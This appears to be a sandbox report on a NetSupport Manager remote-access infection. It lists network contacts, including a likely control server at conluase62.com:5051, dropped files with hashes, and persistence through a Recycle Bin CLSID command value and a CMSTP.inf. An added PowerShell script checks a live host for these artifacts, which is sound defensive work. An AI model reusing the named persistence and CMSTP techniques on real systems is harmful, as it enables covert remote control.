| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 95.101.74.111:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tds-images.thedailystar.net | udp |
| US | 151.101.1.55:443 | tds-images.thedailystar.net | tcp |
| US | 8.8.8.8:53 | 55.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cbngummies.com | udp |
| US | 198.57.244.151:443 | cbngummies.com | tcp |
| US | 8.8.8.8:53 | 151.244.57.198.in-addr.arpa | udp |
| US | 198.57.244.151:443 | cbngummies.com | tcp |
| US | 8.8.8.8:53 | conluase62.com | udp |
| US | 94.158.247.27:5051 | conluase62.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 27.247.158.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.153.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 95.101.74.111:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
memory/1368-134-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/1368-133-0x0000000004F30000-0x0000000004F66000-memory.dmp
memory/1368-135-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1368-136-0x00000000056B0000-0x0000000005CD8000-memory.dmp
memory/1368-137-0x0000000005550000-0x0000000005572000-memory.dmp
memory/1368-138-0x0000000005D50000-0x0000000005DB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enzew10p.31g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1368-139-0x0000000005EF0000-0x0000000005F56000-memory.dmp
memory/1368-149-0x0000000006530000-0x000000000654E000-memory.dmp
memory/1368-150-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1368-151-0x00000000074F0000-0x0000000007586000-memory.dmp
memory/1368-152-0x0000000006A30000-0x0000000006A4A000-memory.dmp
memory/1368-153-0x0000000006A80000-0x0000000006AA2000-memory.dmp
memory/1368-154-0x0000000007B40000-0x00000000080E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
memory/1368-158-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-159-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-160-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4572-162-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
memory/4572-161-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4572-163-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3fc4824e0a712206096191f319e6d6a9 |
| SHA1 | b546e0633e242d2bcb287a0d55baffb3d2e07f10 |
| SHA256 | 8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b |
| SHA512 | 404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49 |
memory/2944-184-0x0000000006EA0000-0x0000000006EE4000-memory.dmp
memory/4572-183-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
memory/4572-185-0x0000000007A40000-0x00000000080BA000-memory.dmp
memory/2944-186-0x0000000007020000-0x0000000007096000-memory.dmp
memory/2944-187-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4572-189-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-191-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-192-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/2944-193-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/2944-195-0x0000000007E20000-0x0000000007E52000-memory.dmp
memory/2944-196-0x000000006E090000-0x000000006E0DC000-memory.dmp
memory/2944-197-0x000000006E1F0000-0x000000006E544000-memory.dmp
memory/2944-207-0x0000000007E00000-0x0000000007E1E000-memory.dmp
memory/2944-208-0x0000000007F50000-0x0000000007F5A000-memory.dmp
memory/2944-209-0x0000000007FC0000-0x0000000007FD2000-memory.dmp
memory/2944-210-0x0000000007FA0000-0x0000000007FAA000-memory.dmp
memory/2944-233-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/4784-236-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4784-237-0x0000000004A60000-0x0000000004A70000-memory.dmp
memory/4784-238-0x0000000004A60000-0x0000000004A70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3111b8507c855bf0afb1b82a6ceb5a3b |
| SHA1 | 09336fa120984ba60e90b8098780de5bc52edae8 |
| SHA256 | 5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace |
| SHA512 | 171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36 |
memory/4784-249-0x0000000004A60000-0x0000000004A70000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline
| MD5 | 29a3f8c092a3b0faa5b6d042e1c978b0 |
| SHA1 | ed601829698514b97f8d9a4f70ace829f9478fb3 |
| SHA256 | 55333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3 |
| SHA512 | a948e44aec0a83aadfea494a52710c444b02f607e3238a7415526d000d70392fe91777059f3b94f29ec995b9be44a33158281068985cf0076134a4927c8991fa |
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.0.cs
| MD5 | 7fbb3f2ac5a0040e7e42f8fc7cd6fbfe |
| SHA1 | 93fcde99bba753677f8786fbcdba4d695296bd12 |
| SHA256 | d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2 |
| SHA512 | 3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8 |
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP
| MD5 | 99098e74c736af4c6091d654bf437908 |
| SHA1 | fbdd75270a2a3199c06d500f375ac8a93d017d61 |
| SHA256 | 736ab241ff665485982d66aca09acba8310e0a802564a4bf1b23b318d641f041 |
| SHA512 | e853007e310ff3698686283628cb7a04b223468776ab622c0e4ad50e7cc722b7011de5fbd678ce32e356256e495133bcf8261e2807f82ca30e59fcc08d167308 |
C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp
| MD5 | e3c3a4cd024da909b42bf03908660705 |
| SHA1 | adb77c2454224fbbde4c497cbd9b293df83a35f7 |
| SHA256 | 6917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944 |
| SHA512 | f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3 |
C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.dll
| MD5 | 66637d2c99c6e40bc6192f1efc4e0f2e |
| SHA1 | 9347c1d7d9bcaac204ca664577ae6381c1f74100 |
| SHA256 | 64d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b |
| SHA512 | 15b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13 |
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf
| MD5 | efb6f1e28f266bb33cb2b76be37cc491 |
| SHA1 | f4cf1bafdccb11486ff7e5e877246e957cae90db |
| SHA256 | d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf |
| SHA512 | 259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546 |
memory/4784-266-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/2944-267-0x000000007EF70000-0x000000007EF80000-memory.dmp
memory/4596-270-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/4596-271-0x0000000002B20000-0x0000000002B30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 41df442e734dce300c0e13bef9a7da8a |
| SHA1 | 7593cd0d7c3f4e64d6049faeb04a5475b610a331 |
| SHA256 | 173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4 |
| SHA512 | b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376 |
memory/2944-284-0x00000000717D0000-0x0000000071F80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | bb7c45699212b8d044800fe3083e69eb |
| SHA1 | c7c2f2122674983ae23e51409abe2e4d26ac4823 |
| SHA256 | 960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf |
| SHA512 | 78557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd |
memory/4596-286-0x0000000002B20000-0x0000000002B30000-memory.dmp
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
| MD5 | 8d9709ff7d9c83bd376e01912c734f0a |
| SHA1 | e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294 |
| SHA256 | 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 |
| SHA512 | 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\IonicBaseband\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.ini
| MD5 | c2fcdcd6299b04fbef530d7b144181d8 |
| SHA1 | 43d8a39fb9a78b244b6740ac654be9fe84d32d31 |
| SHA256 | 4536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5 |
| SHA512 | 4335f0721aeceaf3ce8aa492aea2f66d8dc1930d2963395d7c13768cc0d772d9cf3bdda4e00ad2335d919dfc430022eb64bf6157c2811175844cebf1629917cb |
C:\Users\Admin\AppData\Roaming\IonicBaseband\NSM.LIC
| MD5 | 7067af414215ee4c50bfcd3ea43c84f0 |
| SHA1 | c331d410672477844a4ca87f43a14e643c863af9 |
| SHA256 | 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 |
| SHA512 | 17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f |
C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
| MD5 | 8d9709ff7d9c83bd376e01912c734f0a |
| SHA1 | e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294 |
| SHA256 | 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 |
| SHA512 | 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee |
C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
memory/4596-302-0x00000000717D0000-0x0000000071F80000-memory.dmp
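What this run leaves on a host, from the tables above: a shell\open\command value under CLSID {645FF040-5081-101B-9F08-00AA002F954E}, which is the Recycle Bin's CLSID, written by the 32-bit reg.exe and therefore landing under WOW6432Node as the registry table records; the NetSupport Manager client set (client32.exe, client32.ini, NSM.LIC, PCICL32.DLL, PCICHEK.DLL, pcicapi.dll, HTCTL32.DLL, msvcr100.dll) under %AppData%\IonicBaseband; a directory literally named %AppData% under SysWOW64, which shows the stager's %AppData% token was written without being expanded; and CMSTP.inf in %TEMP%. In the network table the connection to conluase62.com:5051 sits right before the client's lookup of geo.netsupportsoftware.com, where a NetSupport gateway contact would be, so the GatewayAddress in client32.ini is the value to compare it with. The script below is an added example, not the report's: a triage check for those artifacts on a live host. Get-NetSupportArtifacts is a name chosen here; it assumes it runs in the profile the sample ran under and that client32.ini uses the GatewayAddress, GSK and Port entries NetSupport's client configuration normally carries.

```powershell
# Added example, not part of the sandbox report: live-host triage for the artifacts listed above.
# Assumed: run as the affected user; client32.ini carries GatewayAddress/GSK/Port entries.

function Get-NetSupportArtifacts {
    param([string]$AppDataRoot = $env:APPDATA)   # assumed: the profile the sample ran under
    $recycleBin = '{645FF040-5081-101B-9F08-00AA002F954E}'   # Recycle Bin CLSID, as written by reg.exe in the report
    $findings   = New-Object System.Collections.Generic.List[string]

    # 1. shell\open\command under the Recycle Bin CLSID. The 32-bit reg.exe landed in WOW6432Node,
    #    so check both registry views and both hives.
    $keys = @(
        "HKLM:\SOFTWARE\Classes\CLSID\$recycleBin\shell\open\command"
        "HKLM:\SOFTWARE\Classes\WOW6432Node\CLSID\$recycleBin\shell\open\command"
        "HKCU:\SOFTWARE\Classes\CLSID\$recycleBin\shell\open\command"
        "HKCU:\SOFTWARE\Classes\WOW6432Node\CLSID\$recycleBin\shell\open\command"
    )
    foreach ($k in $keys) {
        if (Test-Path -LiteralPath $k) {
            $cmd = (Get-ItemProperty -LiteralPath $k -ErrorAction SilentlyContinue).'(default)'
            $findings.Add("registry: $k = $cmd")
        }
    }

    # 2. NetSupport client set dropped under a profile directory (report: %AppData%\IonicBaseband)
    $nsmFiles = 'client32.exe', 'client32.ini', 'NSM.LIC', 'PCICL32.DLL', 'PCICHEK.DLL', 'pcicapi.dll', 'HTCTL32.DLL', 'msvcr100.dll'
    foreach ($dir in @(Get-ChildItem -LiteralPath $AppDataRoot -Directory -ErrorAction SilentlyContinue)) {
        $present = @(foreach ($f in $nsmFiles) { if (Test-Path -LiteralPath (Join-Path $dir.FullName $f)) { $f } })
        if ($present -contains 'client32.exe' -and $present -contains 'NSM.LIC') {
            $findings.Add("files: NetSupport client in $($dir.FullName) [$($present -join ', ')]")
            $ini = Join-Path $dir.FullName 'client32.ini'
            if (Test-Path -LiteralPath $ini) {
                # the gateway the client calls home to; compare with conluase62.com:5051 in the network table
                foreach ($line in (Get-Content -LiteralPath $ini)) {
                    if ($line -match '^\s*(GatewayAddress|GSK|Port)\s*=') { $findings.Add("client32.ini: $line") }
                }
            }
        }
    }

    # 3. A directory literally named %AppData% under SysWOW64: the stager's token was not expanded
    #    (see the 'Drops file in System32 directory' entry in the report)
    $oddDir = Join-Path $env:windir 'SysWOW64\%AppData%'
    if (Test-Path -LiteralPath $oddDir) { $findings.Add("files: literal %AppData% directory at $oddDir") }

    # 4. INF left behind for cmstp.exe /au
    $inf = Join-Path $env:TEMP 'CMSTP.inf'
    if (Test-Path -LiteralPath $inf) { $findings.Add("files: $inf (cmstp /au input)") }

    return ,$findings
}

$result = Get-NetSupportArtifacts
if ($result.Count -eq 0) { 'no NetSupport artifacts found' } else { $result }
```

The registry check reads the default value rather than just testing for the key, because the key path alone also exists on clean systems where a legitimate handler is registered; the command it points to is what identifies this run. The file set is the stock NetSupport client, so finding it is only meaningful outside the product's own install location and together with the registry or INF artifacts.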